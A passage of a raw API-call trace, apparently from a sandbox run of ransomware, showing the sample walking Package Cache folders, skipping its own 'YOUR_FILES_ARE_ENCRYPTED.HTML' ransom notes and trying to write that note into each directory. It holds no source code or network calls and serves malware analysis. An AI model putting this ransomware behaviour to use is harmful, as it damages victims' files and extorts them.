Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.E5B0EC829362A8A7929D2E88C163B79FC4E0F0E3F6630F06E2DD2EF16D672146") returned 193 [0110.534] PathFindExtensionW (pszPath="cab1.cab.E5B0EC829362A8A7929D2E88C163B79FC4E0F0E3F6630F06E2DD2EF16D672146") returned=".E5B0EC829362A8A7929D2E88C163B79FC4E0F0E3F6630F06E2DD2EF16D672146" [0110.534] lstrlenW (lpString=".E5B0EC829362A8A7929D2E88C163B79FC4E0F0E3F6630F06E2DD2EF16D672146") returned 65 [0110.534] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63b6c8, dwReserved1=0x6f40f0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.534] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.534] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 148 [0110.534] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0110.534] lstrlenW (lpString=".msi") returned 4 [0110.534] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0110.534] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0198ed7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb0198ed7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb01a5118, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b6c8, dwReserved1=0x6f40f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.534] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0198ed7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb0198ed7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb01a5118, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b6c8, dwReserved1=0x6f40f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.535] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.535] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0110.535] GetProcessHeap () returned 0x600000 [0110.535] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.535] GetProcessHeap () returned 0x600000 [0110.535] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.535] GetProcessHeap () returned 0x600000 [0110.535] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.536] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb01a784c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb01a784c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb01ac6a8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.536] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb01a784c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb01a784c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb01ac6a8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4196, dwReserved1=0x6f40e8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.536] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.536] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0110.536] GetProcessHeap () returned 0x600000 [0110.536] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.537] GetProcessHeap () returned 0x600000 [0110.537] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.537] GetProcessHeap () returned 0x600000 [0110.537] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.537] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb01b1464, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb01b1464, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb01b625d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.537] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb01b1464, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb01b1464, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb01b625d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.537] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.537] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0110.537] GetProcessHeap () returned 0x600000 [0110.537] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.538] GetProcessHeap () returned 0x600000 [0110.538] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.538] GetProcessHeap () returned 0x600000 [0110.538] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.539] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388682fc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x3888e6f3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1 [0110.539] StrStrIW (lpFirst="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.539] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 86 [0110.539] GetProcessHeap () returned 0x600000 [0110.539] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.540] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0110.540] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*" [0110.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388682fc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb02cc769, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.540] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x388682fc, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb02cc769, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.540] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x3888e6f3, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.540] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.540] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 95 [0110.540] GetProcessHeap () returned 0x600000 [0110.540] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.541] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages" [0110.541] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*" [0110.541] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb02c3e9e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3d16, dwReserved1=0x6f3c68, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.541] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x3888e6f3, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb02c3e9e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3d16, dwReserved1=0x6f3c68, cFileName="..", cAlternateFileName="")) returned 1 [0110.541] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb03701d2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb03701d2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3d16, dwReserved1=0x6f3c68, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0110.541] StrStrIW (lpFirst="vcRuntimeMinimum_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.541] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 116 [0110.541] GetProcessHeap () returned 0x600000 [0110.541] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.542] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86" [0110.542] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*" [0110.542] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb03701d2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb03701d2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63bba8, dwReserved1=0x6f3c70, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.542] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3888e6f3, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xb03701d2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb03701d2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63bba8, dwReserved1=0x6f3c70, cFileName="..", cAlternateFileName="")) returned 1 [0110.543] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf833b400, ftCreationTime.dwHighDateTime=0x1ced524, ftLastAccessTime.dwLowDateTime=0xf833b400, ftLastAccessTime.dwHighDateTime=0x1ced524, ftLastWriteTime.dwLowDateTime=0xb03ac0f7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xc89b1, dwReserved0=0x63bba8, dwReserved1=0x6f3c70, cFileName="cab1.cab.B52D1C80C438B58BBB8D0842A00B13FA192A823D99581F508317B2B31B31257D", cAlternateFileName="CAB1CA~1.B52")) returned 1 [0110.543] StrStrIW (lpFirst="cab1.cab.B52D1C80C438B58BBB8D0842A00B13FA192A823D99581F508317B2B31B31257D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.543] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.B52D1C80C438B58BBB8D0842A00B13FA192A823D99581F508317B2B31B31257D") returned 190 [0110.543] PathFindExtensionW (pszPath="cab1.cab.B52D1C80C438B58BBB8D0842A00B13FA192A823D99581F508317B2B31B31257D") returned=".B52D1C80C438B58BBB8D0842A00B13FA192A823D99581F508317B2B31B31257D" [0110.543] lstrlenW (lpString=".B52D1C80C438B58BBB8D0842A00B13FA192A823D99581F508317B2B31B31257D") returned 65 [0110.543] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8210100, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0xb8210100, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0xb8210100, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x63bba8, dwReserved1=0x6f3c70, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.543] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.543] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 142 [0110.543] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0110.543] lstrlenW (lpString=".msi") returned 4 [0110.543] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0110.543] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02ae054, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02ae054, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb02bf1be, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63bba8, dwReserved1=0x6f3c70, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.543] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02ae054, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02ae054, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb02bf1be, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63bba8, dwReserved1=0x6f3c70, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.543] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.543] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 146 [0110.543] GetProcessHeap () returned 0x600000 [0110.543] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.543] GetProcessHeap () returned 0x600000 [0110.543] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.544] GetProcessHeap () returned 0x600000 [0110.544] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.544] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02c3e9e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02c3e9e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb02c7a6f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3d16, dwReserved1=0x6f3c68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.544] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb02c3e9e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb02c3e9e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb02c7a6f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3d16, dwReserved1=0x6f3c68, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.544] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.544] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0110.544] GetProcessHeap () returned 0x600000 [0110.544] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, 